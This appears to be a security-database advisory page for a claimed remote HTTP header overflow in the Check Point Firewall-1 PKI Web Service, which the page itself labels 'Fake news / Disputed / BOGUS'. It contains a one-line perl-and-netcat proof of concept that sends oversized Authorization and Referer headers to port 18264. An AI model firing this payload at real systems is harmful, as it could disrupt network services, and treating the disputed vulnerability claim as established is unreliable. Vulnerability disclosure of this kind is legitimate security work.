WARNING! Fake news / Disputed / BOGUS

Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

2009-03-30 / 2009-03-31
Credit: Bugs NotHugs
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

- Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP port 18264, is vulnerable to a remote overflow in the handling of very long HTTP headers. This was discovered during a pen-test where the client would not allow further analysis and would not provide the full product/version info. Initial testing indicates the 'Authorization' and 'Referer' headers were vulnerable.

- Product

Check Point, Firewall-1, unknown

- PoC

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 . "\r\nFrom: bugs_at_hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 . "\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc suckit.com 18264

- Solution

None

- Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

References:

http://www.securitytracker.com/id?1021948
http://www.securityfocus.com/bid/34286
http://www.securityfocus.com/archive/1/archive/1/502256/100/0/threaded
http://www.milw0rm.com/exploits/8313
http://archives.neohapsis.com/archives/fulldisclosure/2009-03/0463.html

